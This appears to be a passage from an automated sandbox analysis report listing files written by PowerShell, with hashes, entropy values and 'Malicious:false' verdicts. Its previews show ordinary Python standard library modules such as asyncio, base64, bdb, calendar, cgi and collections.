                              Preview:import socket......class TransportSocket:.... """A socket-like wrapper for exposing real transport sockets..... These objects can be safely returned by APIs like.. `transport.get_extra_info('socket')`. All potentially disruptive.. operations (like "socket.close()") are banned... """.... __slots__ = ('_sock',).... def __init__(self, sock: socket.socket):.. self._sock = sock.... @property.. def family(self):.. return self._sock.family.... @property.. def type(self):.. return self._sock.type.... @property.. def proto(self):.. return self._sock.proto.... def __repr__(self):.. s = (.. f"<asyncio.TransportSocket fd={self.fileno()}, ".. f"family={self.family!s}, type={self.type!s}, ".. f"proto={self.proto}".. ).... if self.fileno() != -1:.. try:.. laddr = self.getsockname().. if laddr:.. s = f"{s}, laddr={laddr
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):54624
                              Entropy (8bit):4.32194179582691
                              Encrypted:false
                              SSDEEP:768:vSYjWziU+bQBl5Xby0sIztcA8Z3gYhTUqW0KCcWe8S1J1No4by:vSYjVAq/cW41U
                              MD5:979E8018D3242BDB10D75D5E4AEA538E
                              SHA1:96C1D1757D764E94651BC1E1233C63E920D549AD
                              SHA-256:7DF3B5336C8DF24963EAAEE142F0E5CA25ADC3F7173CA3B4DC91BD2C5817D8AD
                              SHA-512:BDCAFDF05449D60E47D78ECA23434532C933A8A6034814BC00D3D8F7E3C62947349F47345F87CF6A2FFDB72E72FF5D38E3252B2BFCFDB5572D1683EF70AEE551
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Selector event loop for Unix with signal handling."""....import errno..import io..import itertools..import os..import selectors..import signal..import socket..import stat..import subprocess..import sys..import threading..import warnings....from . import base_events..from . import base_subprocess..from . import constants..from . import coroutines..from . import events..from . import exceptions..from . import futures..from . import selector_events..from . import tasks..from . import transports..from .log import logger......__all__ = (.. 'SelectorEventLoop',.. 'AbstractChildWatcher', 'SafeChildWatcher',.. 'FastChildWatcher', 'PidfdChildWatcher',.. 'MultiLoopChildWatcher', 'ThreadedChildWatcher',.. 'DefaultEventLoopPolicy',..)......if sys.platform == 'win32': # pragma: no cover.. raise ImportError('Signals are not really supported on Windows')......def _sighandler_noop(signum, frame):.. """Dummy signal handler.""".. pass......def waitstatus_to_exitcode(status):.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):33488
                              Entropy (8bit):4.416832197041315
                              Encrypted:false
                              SSDEEP:384:YSFlSE8iWvPeLAZqzDr1LZPJKxaKSCsiWsgTZ:YSFlwyzDrDPJyaKIiWsS
                              MD5:D7001F859BE7BFEE335A062CB6779E73
                              SHA1:41543F6D399B0F7E260D352A376D7FA1EB1C989A
                              SHA-256:0F94ACDFD79706099961BB265A0E6431E744234CAC3F572209A1653A5321FDA7
                              SHA-512:E163E9ACBD1F14E72F18101E53CF5B69420D9EBC3583C16C72CB3677A790FD02A3540C06F347CDB05A06BF7C49512278207B28EBEC5F7935015E0C9EB313F010
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Selector and proactor event loops for Windows."""....import sys....if sys.platform != 'win32': # pragma: no cover.. raise ImportError('win32 only')....import _overlapped..import _winapi..import errno..from functools import partial..import math..import msvcrt..import socket..import struct..import time..import weakref....from . import events..from . import base_subprocess..from . import futures..from . import exceptions..from . import proactor_events..from . import selector_events..from . import tasks..from . import windows_utils..from .log import logger......__all__ = (.. 'SelectorEventLoop', 'ProactorEventLoop', 'IocpProactor',.. 'DefaultEventLoopPolicy', 'WindowsSelectorEventLoopPolicy',.. 'WindowsProactorEventLoopPolicy',..)......NULL = _winapi.NULL..INFINITE = _winapi.INFINITE..ERROR_CONNECTION_REFUSED = 1225..ERROR_CONNECTION_ABORTED = 1236....# Initial delay in seconds for connect_pipe() before retrying to connect..CONNECT_PIPE_INIT_DELAY = 0.001....# Maximum delay
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5233
                              Entropy (8bit):4.66851270735605
                              Encrypted:false
                              SSDEEP:48:boTZtyajYlxYEsofyCFdVhXpdGepIpLbpxYaVXwW/W6CGIa8HR5Kw7ygKwabPKwP:boF8aElNfyUpHbO5LQWQ3H6w7yBwASwP
                              MD5:3D2450646C295F667F04535CB6511EE9
                              SHA1:25FF829B27063DA4032110F82531A3657DDEA61A
                              SHA-256:23FF6C7FECECFE35A06EAF7615C1E1E67C0740B78CA75A04C548B184BE87B958
                              SHA-512:76763286932FA7B2105DEC85F82A34B14A55FC747BDEED12DCC78F5D779CCBB4BC05D81E13316E3C65C6E34772B8995A2D66AC0DE59B8F29F51E54DEE4734457
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Various Windows specific bits and pieces."""....import sys....if sys.platform != 'win32': # pragma: no cover.. raise ImportError('win32 only')....import _winapi..import itertools..import msvcrt..import os..import subprocess..import tempfile..import warnings......__all__ = 'pipe', 'Popen', 'PIPE', 'PipeHandle'......# Constants/globals......BUFSIZE = 8192..PIPE = subprocess.PIPE..STDOUT = subprocess.STDOUT.._mmap_counter = itertools.count()......# Replacement for os.pipe() using handles instead of fds......def pipe(*, duplex=False, overlapped=(True, True), bufsize=BUFSIZE):.. """Like os.pipe() but with overlapped support and using handles not fds.""".. address = tempfile.mktemp(.. prefix=r'\\.\pipe\python-pipe-{:d}-{:d}-'.format(.. os.getpid(), next(_mmap_counter))).... if duplex:.. openmode = _winapi.PIPE_ACCESS_DUPLEX.. access = _winapi.GENERIC_READ | _winapi.GENERIC_WRITE.. obsize, ibsize = bufsize, bufsize.. else:.. ope
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):21189
                              Entropy (8bit):4.826320961193315
                              Encrypted:false
                              SSDEEP:384:j+uTw4InidNdYsBM+3O8dvd936r34MJIBf5V1u:9xIANdNBM+3O8dvd936kfB57u
                              MD5:231AE490D92466B1573E541649772154
                              SHA1:4E47769F5A3239F17AF2CE1D9A93C411C195A932
                              SHA-256:9E685425290C771DF1A277B5C7787AD5D4CF0312F2C4B042CE44756DF6A3D112
                              SHA-512:7084B49F0788BFBE035BC2FE42DB7A63B21EBC99F63C03F80DEC5569067C1E63312D8C5A754F2D72D7C9BB51FA23CA479FCBA78682610EB2B68870CBEAE1BEA3
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:#! /usr/bin/env python3...."""Base16, Base32, Base64 (RFC 3548), Base85 and Ascii85 data encodings"""....# Modified 04-Oct-1995 by Jack Jansen to use binascii module..# Modified 30-Dec-2003 by Barry Warsaw to add full RFC 3548 support..# Modified 22-May-2007 by Guido van Rossum to use bytes everywhere....import re..import struct..import binascii......__all__ = [.. # Legacy interface exports traditional RFC 2045 Base64 encodings.. 'encode', 'decode', 'encodebytes', 'decodebytes',.. # Generalized interface for other encodings.. 'b64encode', 'b64decode', 'b32encode', 'b32decode',.. 'b32hexencode', 'b32hexdecode', 'b16encode', 'b16decode',.. # Base85 and Ascii85 encodings.. 'b85encode', 'b85decode', 'a85encode', 'a85decode',.. # Standard Base64 encoding.. 'standard_b64encode', 'standard_b64decode',.. # Some common Base64 alternatives. As referenced by RFC 3458, see thread.. # starting at:.. #.. # http://zgp.org/pipermail/p2p-hackers/2001-September/00
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):33356
                              Entropy (8bit):4.376082539550425
                              Encrypted:false
                              SSDEEP:384:jv2yeGid9OJ5zweRTWR8mQL+7bN3Lczaa7iXBW8widsF/isFuJQMFIqZ4F9bFxS:jvYVd9OH7s81+7xczaaeXklwBqqZoS
                              MD5:01EF6CDE1AA70849AA0075A172DF530B
                              SHA1:74EE7F1D19C9B91671B77D0B757B7C0B03FDF069
                              SHA-256:6FF624D945871D29763B60FD1B4B15A30B2D161853B42D7B0F13BFACB825194C
                              SHA-512:148C1AAB60E367942AAD47AD1F0C2C346A401FB6AA65BB67B17A82D9C8D260584C53C7326BFB0D76209B7C47B446E011388BE344E115CDFA4C86AE555F2B1F83
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Debugger basics"""....import fnmatch..import sys..import os..from inspect import CO_GENERATOR, CO_COROUTINE, CO_ASYNC_GENERATOR....__all__ = ["BdbQuit", "Bdb", "Breakpoint"]....GENERATOR_AND_COROUTINE_FLAGS = CO_GENERATOR | CO_COROUTINE | CO_ASYNC_GENERATOR......class BdbQuit(Exception):.. """Exception to give up completely."""......class Bdb:.. """Generic Python debugger base class..... This class takes care of details of the trace facility;.. a derived class should implement user interaction... The standard debugger class (pdb.Pdb) is an example..... The optional skip argument must be an iterable of glob-style.. module name patterns. The debugger will not step into frames.. that originate in a module that matches one of these patterns... Whether a frame is considered to originate in a certain module.. is determined by the __name__ in the frame globals... """.... def __init__(self, skip=None):.. self.skip = set(skip) if skip else None..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):3541
                              Entropy (8bit):4.348806691148274
                              Encrypted:false
                              SSDEEP:48:zPKqBnBS/M2bld2S/qu47KHBntS/bEmXNYldcS/osuz:rnBBSE2bySCu47MBtSDEmXNYwSAtz
                              MD5:3AC90488AE7B8D9BD94AF42E5B341EE8
                              SHA1:1A061493EAB0B6A5BFBE0A145CB320A28984AE89
                              SHA-256:085DAD54DD1A00D68AAA5361031C0C4BFF5EFBD281D1A02DDC8F317C519E540B
                              SHA-512:BD3C8CE218D70C146D06D722D096816FE975F4C85C4BBF75F2EFC928F7DE7B97849B1FC632A9EE2A81F92F60F7E9712141AF5A273EB49F9125336422BCB193E4
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Bisection algorithms."""......def insort_right(a, x, lo=0, hi=None, *, key=None):.. """Insert item x in list a, and keep it sorted assuming a is sorted..... If x is already in a, insert it to the right of the rightmost x..... Optional args lo (default 0) and hi (default len(a)) bound the.. slice of a to be searched..... A custom key function can be supplied to customize the sort order... """.. if key is None:.. lo = bisect_right(a, x, lo, hi).. else:.. lo = bisect_right(a, key(x), lo, hi, key=key).. a.insert(lo, x)......def bisect_right(a, x, lo=0, hi=None, *, key=None):.. """Return the index where to insert item x in list a, assuming a is sorted..... The return value i is such that all e in a[:i] have e <= x, and all e in.. a[i:] have e > x. So if x already appears in the list, a.insert(i, x) will.. insert just after the rightmost x already there..... Optional args lo (default 0) and hi (default len(a)) bound the.. slice o
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):12191
                              Entropy (8bit):4.488567907611872
                              Encrypted:false
                              SSDEEP:96:wzhNfE8LZDY+YEzU3/OF/q+FjqqxbWXVvScmwWa0r1LAd1ichQiilHfP6Qhc9O1O:KLrXX/q+FjZWq2Wan3oxc8NE0Bx4
                              MD5:C7F6B929829D1196DFC6C59BFA8BE4D5
                              SHA1:2B0A3AF1F680F8D70E05A25AA8552A47E5109F7D
                              SHA-256:A539FC503737C53D5A45272E33A435B8A6B7A8559BA6A425002978038096BD66
                              SHA-512:63BFA9AD43141C609436B928F7DEBB5477188F1E7B30EBD6D9CC5080DB6D10FBF4E94C25BEC3E2C7DC8677D7BCD537B93550324A08B5376FD9E35184A8517E3B
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Interface to the libbzip2 compression library.....This module provides a file interface, classes for incremental..(de)compression, and functions for one-shot (de)compression..."""....__all__ = ["BZ2File", "BZ2Compressor", "BZ2Decompressor",.. "open", "compress", "decompress"]....__author__ = "Nadeem Vawda <nadeem.vawda@gmail.com>"....from builtins import open as _builtin_open..import io..import os..import _compression....from _bz2 import BZ2Compressor, BZ2Decompressor......_MODE_CLOSED = 0.._MODE_READ = 1..# Value 2 no longer used.._MODE_WRITE = 3......class BZ2File(_compression.BaseStream):.... """A file object providing transparent bzip2 (de)compression..... A BZ2File can act as a wrapper for an existing file object, or refer.. directly to a named file on disk..... Note that BZ2File provides a *binary* file interface - data read is.. returned as bytes, and data to be written should be given as bytes... """.... def __init__(self, filename, mo
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):6751
                              Entropy (8bit):4.372089344710114
                              Encrypted:false
                              SSDEEP:192:GzRbR7raBofIUXCM/nRwcIxjZzx2kl7ThaiDwj0:GN1CeIKZMZzx2I7NJ
                              MD5:7A452B99ABF85FE515C607185633F7C7
                              SHA1:37E4A0B74315CD605BA834036E68EBD5218B9267
                              SHA-256:8CD9BC9E6ED6CF5B24EC0259B242CE0F3B90DBBF707AD775E146347E5308A3AC
                              SHA-512:744DC2E1978C57E8AFF571CC17194F09559883E3F46D84CCFB128583EB9EC4888FD51553527AB4F714D03C779B8968C16984E6A5B60833E3A37972969BE36624
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:#! /usr/bin/env python3...."""Python interface for the 'lsprof' profiler... Compatible with the 'profile' module..."""....__all__ = ["run", "runctx", "Profile"]....import _lsprof..import importlib.machinery..import io..import profile as _pyprofile....# ____________________________________________________________..# Simple interface....def run(statement, filename=None, sort=-1):.. return _pyprofile._Utils(Profile).run(statement, filename, sort)....def runctx(statement, globals, locals, filename=None, sort=-1):.. return _pyprofile._Utils(Profile).runctx(statement, globals, locals,.. filename, sort)....run.__doc__ = _pyprofile.run.__doc__..runctx.__doc__ = _pyprofile.runctx.__doc__....# ____________________________________________________________....class Profile(_lsprof.Profiler):.. """Profile(timer=None, timeunit=None, subcalls=True, builtins=True).... Builds a profiler object using the specified timer function... The default
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26216
                              Entropy (8bit):4.668179135447798
                              Encrypted:false
                              SSDEEP:384:TvzXruAqTnK7ZC77ZMVw6dPRSEFsW8ehzEOPp7OKkmL3:TrX6AqTnK7WSW67SE+W8euOPp7gc
                              MD5:15BFD34DD4F3E752EE250C95B7627E84
                              SHA1:A853D016A1F6F2EA79EE69E652FFDCE5A88BF6F4
                              SHA-256:F1488547B4A1783E310461C21552E6B75D0D55C89D46BE6AEF23F82008474D60
                              SHA-512:5A0ACE7F77249124A4F0F389CD7B7674325A94B9AA3003BD277931F3A5DC618B6CA4CBD5C4B85BD809AE248F012EBA4EDBDD76C73B8D6AB277A641E35072044B
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Calendar printing functions....Note when comparing these calendars to the ones printed by cal(1): By..default, these calendars have Monday as the first day of the week, and..Sunday as the last (the European convention). Use setfirstweekday() to..set the first day of the week (0=Monday, 6=Sunday)."""....import sys..import datetime..from enum import IntEnum, global_enum..import locale as _locale..from itertools import repeat..import warnings....__all__ = ["IllegalMonthError", "IllegalWeekdayError", "setfirstweekday",.. "firstweekday", "isleap", "leapdays", "weekday", "monthrange",.. "monthcalendar", "prmonth", "month", "prcal", "calendar",.. "timegm", "month_name", "month_abbr", "day_name", "day_abbr",.. "Calendar", "TextCalendar", "HTMLCalendar", "LocaleTextCalendar",.. "LocaleHTMLCalendar", "weekheader",.. "Day", "Month", "JANUARY", "FEBRUARY", "MARCH",.. "APRIL", "MAY", "JUNE", "JULY",.. "AUGUST", "SEPT
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):35432
                              Entropy (8bit):4.5655412978209835
                              Encrypted:false
                              SSDEEP:768:V2v4jDz46jcJeYMs0s1mZrgmTJFg9kAQNM0KJkY:Vu4A6jcV0swZrgIJFg9kAQNM0KJkY
                              MD5:71CF25331B3B8E9A3FDFF28A13CA0DA9
                              SHA1:7926E88D4E54A8C3CFF2473427D3CC583F08595D
                              SHA-256:CC73FBC2865D5E88F1E04D23F5E0B0A4AD46EA7410C86B39A43B8EAA0384DACA
                              SHA-512:2C16D08610A77521619116D20CABF3033A2098936EAECF6E043DD00C62C44B4A3DE7BC99F3BC2E1867F788F691D4C4D72EF7F5DED70A8E66D98D9B3B1AD846CD
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:#! /usr/local/bin/python....# NOTE: the above "/usr/local/bin/python" is NOT a mistake. It is..# intentionally NOT "/usr/bin/env python". On many systems..# (e.g. Solaris), /usr/local/bin is not in $PATH as passed to CGI..# scripts, and /usr/local/bin is the default directory where Python is..# installed, so /usr/bin/env would be unable to find python. Granted,..# binary installations by Linux vendors often install Python in..# /usr/bin. So let those vendors patch cgi.py to match their choice..# of installation....."""Support module for CGI (Common Gateway Interface) scripts.....This module defines a number of utilities for use by CGI scripts..written in Python.....The global variable maxlen can be set to an integer indicating the maximum size..of a POST request. POST requests larger than this size will result in a..ValueError being raised during parsing. The default value of this variable is 0,..meaning the request size is unlimited..."""....# History..# -------..#..# Michael McLa
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):12753
                              Entropy (8bit):4.632770457016971
                              Encrypted:false
                              SSDEEP:192:J3xSBs8vXrberb4e2VcxsfBP9DG5mGFWMh+bVuJyGaUOsK/2J4hXTirLu/y6aUMh:Cs8frqrtxZPhFy/UOt+JeyDUMkJo/tXR
                              MD5:354C0C2AD94D77FB953D527A97312B3E
                              SHA1:EA665B087D00B34E67ADE3FC183F204476E40C54
                              SHA-256:A61B06E42D738FCA9FC1839441B54B21BB5C39C315A7FAD67E0C44D74154ECFE
                              SHA-512:675DF0D81B34389C448AC3BBB87B711EC2E62CD60936C0E8E34CB9D6FAA562AC2276BF518692778901488511D068251AC718916AFB62658D8181FEA12AC22976
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""More comprehensive traceback formatting for Python scripts.....To enable this module, do:.... import cgitb; cgitb.enable()....at the top of your script. The optional arguments to enable() are:.... display - if true, tracebacks are displayed in the web browser.. logdir - if set, tracebacks are written to files in this directory.. context - number of lines of source code to show for each stack frame.. format - 'text' or 'html' controls the output format....By default, tracebacks are displayed but not saved, the context is 5 lines..and the output format is 'html' (for backwards compatibility with the..original use of this module)....Alternatively, if you have caught an exception and want cgitb to display it..for you, call cgitb.handler(). The optional argument to handler() is a..3-item tuple (etype, evalue, etb) just like the value of sys.exc_info()...The default handler displays output as HTML....."""..import inspect..import keyword..import linecache
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5673
                              Entropy (8bit):4.3907004428499565
                              Encrypted:false
                              SSDEEP:96:Or09dhcWG/Fu2EC6Gx6h8zsGx/SAojX6wu/YBsrgS:OV40Ohqs06Dul1v
                              MD5:3A8DBD502B1B1AF5C9F241ECFF1BAF93
                              SHA1:AD663612D098B07FD64FE8409CDF0AFEFD0B1321
                              SHA-256:78554D5FD093A64D0F63C4930E206203412B17318282E3D0C1A10BADB7C28CBD
                              SHA-512:A94F5E4EC608392E4511C26FFC8B58AD88490B72678F9D98A1F673DAFE0D8A7970BB4CD676EEE1B98611116643D3BF86D8B77CB45C8819DD3F17A53D3F0A5462
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Simple class to read IFF chunks.....An IFF chunk (used in formats such as AIFF, TIFF, RMFF (RealMedia File..Format)) has the following structure:....+----------------+..| ID (4 bytes) |..+----------------+..| size (4 bytes) |..+----------------+..| data |..| ... |..+----------------+....The ID is a 4-byte string which identifies the type of chunk.....The size field (a 32-bit value, encoded using big-endian byte order)..gives the size of the whole chunk, including the 8-byte header.....Usually an IFF-type file consists of one or more chunks. The proposed..usage of the Chunk class defined here is to instantiate an instance at..the start of each chunk and read from the instance until it reaches..the end, after which a new instance can be instantiated. At the end..of the file, creating a new instance will fail with an EOFError..exception.....Usage:..while True:.. try:.. chunk = Chunk(file).. except EOFError:.. break.. chunktype = chunk.get
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):15274
                              Entropy (8bit):4.213305027609708
                              Encrypted:false
                              SSDEEP:192:PL0k/Lx0tTb7zgerjv/DrjydCD1azzAr3hBaUcWkfcoBOvtBA5FMk:PL07tTbnge/zrjOcuAr3hTctfhj
                              MD5:B2E826868B72DF359289D0CF2D27D9E9
                              SHA1:F29D5964C3E83013C6A8FE8C2B1E56A9E6FAF9C1
                              SHA-256:165B7F2ED818AFC700DDAAF8D8FB2918E4A1E585A5965F0172D96DF6F1FD9962
                              SHA-512:AA1A649A1FCBB123657BCCD0F33FDFE2FBDA027D6B4312B73083A7689D4C3A05F96C9C2C4CDFED43746B3307A0CF17A338BCB203FF2CF4D425EAE9E689FEBD14
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""A generic class to build line-oriented command interpreters.....Interpreters constructed with this class obey the following conventions:....1. End of file on input is processed as the command 'EOF'...2. A command is parsed out of each line by collecting the prefix composed.. of characters in the identchars member...3. A command `foo' is dispatched to a method 'do_foo()'; the do_ method.. is passed a single argument consisting of the remainder of the line...4. Typing an empty line repeats the last command. (Actually, it calls the.. method `emptyline', which may be overridden in a subclass.)..5. There is a predefined `help' method. Given an argument `topic', it.. calls the command `help_topic'. With no arguments, it lists all topics.. with defined help_ functions, broken into up to three topics; documented.. commands, miscellaneous help topics, and undocumented commands...6. The command '?' is a synonym for `help'. The command '!' is a synonym.. for `shell', if a do_
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):11012
                              Entropy (8bit):4.359905084854054
                              Encrypted:false
                              SSDEEP:192:BXaaxojmnEGaG2vGKDOwyTe4J54iLxqeKon:BXaanOt8eoCMbKo
                              MD5:1840A8815D3D702DB9968063C681C503
                              SHA1:CC206EB72520580604032955A95127B735A4BB9B
                              SHA-256:044F67D22DB4DC4A3B5F4353FE6FA83DD3B02A2288EC672411DCD9676713748D
                              SHA-512:EDE3567AC602D19A4ECDFD1CC3F8BFADBC524ECEE0C7355C66143FD211893122B95D399827E10D3A7EC62497B593AA6A03D3C33839197BEE6111A07480835B99
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Utilities needed to emulate Python's interactive interpreter....."""....# Inspired by similar code by Jeff Epler and Fredrik Lundh.......import sys..import traceback..from codeop import CommandCompiler, compile_command....__all__ = ["InteractiveInterpreter", "InteractiveConsole", "interact",.. "compile_command"]....class InteractiveInterpreter:.. """Base class for InteractiveConsole..... This class deals with parsing and interpreter state (the user's.. namespace); it doesn't deal with input buffering or prompting or.. input file naming (the filename is always passed in explicitly)..... """.... def __init__(self, locals=None):.. """Constructor..... The optional 'locals' argument specifies the dictionary in.. which code will be executed; it defaults to a newly created.. dictionary with key "__name__" set to "__console__" and key.. "__doc__" set to None..... """.. if locals is None:.. locals = {"__n
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):37999
                              Entropy (8bit):4.4059544047995285
                              Encrypted:false
                              SSDEEP:768:JsOEZ+8dxiEjo5g4cyjh8Rx+foH20+MEtiyAmpqiWjo:JXfm+MEtiyAmpqiWjo
                              MD5:02D15642CA5C5F2FA6DAB2032BF3BAC1
                              SHA1:6A57BAAC2F284CAD413ABFCDCF4B06CBAB496BA7
                              SHA-256:000CF1D683C677ED3DE6D8E284376F81DEF4B91F93D68EE41BDF07C4E04CEA77
                              SHA-512:23A251CF3CF0C73F22741B50D98C6B4C3156F934780A37E72C69325A9796534BC3D67849704D53D83BF8FB5DE747FB3BFAD59FC5CA7F8C074A5C4C2574C19329
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:""" codecs -- Python Codec Registry, API and helpers.......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""....import builtins..import sys....### Registry and builtin stateless codec functions....try:.. from _codecs import *..except ImportError as why:.. raise SystemError('Failed to load the builtin codecs: %s' % why)....__all__ = ["register", "lookup", "open", "EncodedFile", "BOM", "BOM_BE",.. "BOM_LE", "BOM32_BE", "BOM32_LE", "BOM64_BE", "BOM64_LE",.. "BOM_UTF8", "BOM_UTF16", "BOM_UTF16_LE", "BOM_UTF16_BE",.. "BOM_UTF32", "BOM_UTF32_LE", "BOM_UTF32_BE",.. "CodecInfo", "Codec", "IncrementalEncoder", "IncrementalDecoder",.. "StreamReader", "StreamWriter",.. "StreamReaderWriter", "StreamRecoder",.. "getencoder", "getdecoder", "getincrementalencoder",.. "getincrementaldecoder", "getreader", "getwriter",.. "encode", "decode", "iter
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):6069
                              Entropy (8bit):4.697072368349036
                              Encrypted:false
                              SSDEEP:96:CH1OT+d3PVtx6zAg5x4Y0s2WbFrSNRa/y4DrY1lODbCMPikrv59S4RzC4Xovtr0o:sOOPfqASx49WbFrORa/yCYODrit4RzCl
                              MD5:62AC1E4162F4E5BD48D25DA8307BC46B
                              SHA1:82A983BBBFDBAC1EC8F65ED51FD00C1E2729C3D7
                              SHA-256:62F6D6D926C2DC4F3B7AA7ABD2AEB025B5DE716A53F590B641EF82B00A810B50
                              SHA-512:6246CC8EA37909A2148581816EF57F21B1396CEBB6AC734365D30DFF2CFD0458353D31CEA5128F216456BD3F3CCE4654F4212B407DBCE40EF53223251E3B9608
                              Malicious:false
                              Preview:r"""Utilities to compile possibly incomplete Python source code.....This module provides two interfaces, broadly similar to the builtin..function compile(), which take program text, a filename and a 'mode'..and:....- Return code object if the command is complete and valid..- Return None if the command is incomplete..- Raise SyntaxError, ValueError or OverflowError if the command is a.. syntax error (OverflowError and ValueError can be produced by.. malformed literals).....The two interfaces are:....compile_command(source, filename, symbol):.... Compiles a single command in the manner described above.....CommandCompiler():.... Instances of this class have __call__ methods identical in.. signature to compile_command; the difference is that if the.. instance compiles program text containing a __future__ statement,.. the instance 'remembers' and compiles all subsequent program texts.. with the statement in force.....The module also provides another class:....Compile():.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):53970
                              Entropy (8bit):4.499375019885922
                              Encrypted:false
                              SSDEEP:1536:aCI43OwctD9O9FtPxdKtDXo0a4vpHK10cJXPxpN6IKhjtFo:XI43OwctBOgJq
                              MD5:251382C3E093C311A3E83651CBDBCC11
                              SHA1:28A9DE0E827B37280C44684F59FD3FCC54E3EABD
                              SHA-256:1EB4C4445883FD706016ACA377D9E5C378BAC0412D7C9B20F71CAE695D6BB656
                              SHA-512:010B171F3DD0AA676261A3432FE392568F364FE43C6CB4615B641994EB2FAF48CAABF3080EDF3C00A1A65FC43748CAAF692A3C7D1311B6C90825FFCE185162B0
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:'''This module implements specialized container datatypes providing..alternatives to Python's general purpose built-in containers, dict,..list, set, and tuple.....* namedtuple factory function for creating tuple subclasses with named fields..* deque list-like container with fast appends and pops on either end..* ChainMap dict-like class for creating a single view of multiple mappings..* Counter dict subclass for counting hashable objects..* OrderedDict dict subclass that remembers the order entries were added..* defaultdict dict subclass that calls a factory function to supply missing values..* UserDict wrapper around dictionary objects for easier dict subclassing..* UserList wrapper around list objects for easier list subclassing..* UserString wrapper around string objects for easier string subclassing....'''....__all__ = [.. 'ChainMap',.. 'Counter',.. 'OrderedDict',.. 'UserDict',.. 'UserList',.. 'UserString',.. 'defaultdict',.. 'd
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):73128
                              Entropy (8bit):4.991248012037406
                              Encrypted:false
                              SSDEEP:1536:Rq/j9e0macPTHWTDRBPoYI+gfbY0A3kckNVQdqfRmO/8hDyPxz:kg0mvTExqf4O/8Gxz
                              MD5:5DED9AEBC5BB1B2B7D27443E6E0A9437
                              SHA1:32C060890716C8ACED35C92E2E7BA23199A2FD7A
                              SHA-256:8589A1421368D7B06C7FF575007D85B5CADE092062F814B7AA4873C2BEADE5BC
                              SHA-512:7509EF1CFC98629FB5916A2913225098D4A84ECD7BB2CAC13DF80486DC11B478D1E605B1E2BF3B9DF89364049DE1289269B48B389313937786BE985088700AF5
                              Malicious:false
